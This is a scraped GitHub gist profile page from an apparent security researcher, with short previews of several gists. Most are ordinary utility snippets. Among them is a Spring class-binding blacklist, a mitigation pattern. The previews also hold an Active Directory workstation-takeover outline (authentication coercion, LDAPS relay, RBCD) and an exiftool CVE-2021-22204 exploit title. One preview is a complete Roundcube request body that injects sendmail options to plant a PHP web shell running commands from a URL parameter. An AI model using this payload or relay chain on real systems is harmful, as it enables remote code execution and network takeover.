Skip to content

Instantly share code, notes, and snippets.


Ihebski ihebski

  • Error: Unable to resolve
View GitHub Profile
View gist:13c69f0badb50b8bbb76b92e6f7517f0
// shared by @Retrospected:
public void initBinder(WebDataBinder binder) {
String[] blackList = {"class.*","Class.*","*.class.*",".*Class.*"};
ihebski /
Created Mar 19, 2022
auto connect to vpn
#!/usr/bin/expect -f
# Constants
set user ""
set pass ""
set timeout -1
# Options
match_max 100000
log_user 0
ihebski /
Created Dec 27, 2021
backup and restore mysql database from defectdojo container
# Get container id
docker ps | grep mysql
# Backup
docker exec -it <container_id> mysqldump -u defectdojo --password=defectdojo defectdojo > backup.sql
# Restore
docker exec -i <container_id> mysql -u defectdojo --password=defectdojo defectdojo < cat backup.sql
View requirement.txt
ihebski /
Created Jul 28, 2021 — forked from gladiatx0r/
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

View 100.release-setup
#!/usr/bin/env perl
# Help the initial setup of configurable parameters.
# If not yet available, create/update a generic $home/lib/setup-generic
# Also, create/update a release specific config $home/lib/setup-$version
# Chicken' egg situation: the parameters may have been passed to the
# install script, but we may not have the required module installed to
# process it. The values were passed via environment variables.
use warnings;
ihebski /
Last active May 18, 2021
exiftool exploit POC - CVE-2021-22204

exiftool exploit : CVE-2021-22204

View gist:c5c800f3b47b6321639d3562e03ba49b
_token=VufHk5rpfJAVvw0SYqCYDZVUK4pKbgVy&_task=mail&_action=send&_id=19306581945fb451c9405a8&_attachments=& -OQueueDirectory=/tmp -X/var/www/html/roundcube/backdoor4.php&<?php echo passthru($_GET['cmd']); ?>&editorSelector=plain&_priority=0&_store_target=&_draft_saveid=&_draft=&_is_html=0&_framed=1&_message=pwn
View gist:3073daff8e831ae899ab9049d57a651e
import re
from furl import furl
def param_extract(response, level, black_list, placeholder):
regexp : r'.*?:\/\/.*\?.*\=[^$]'
regexp : r'.*?:\/\/.*\?.*\='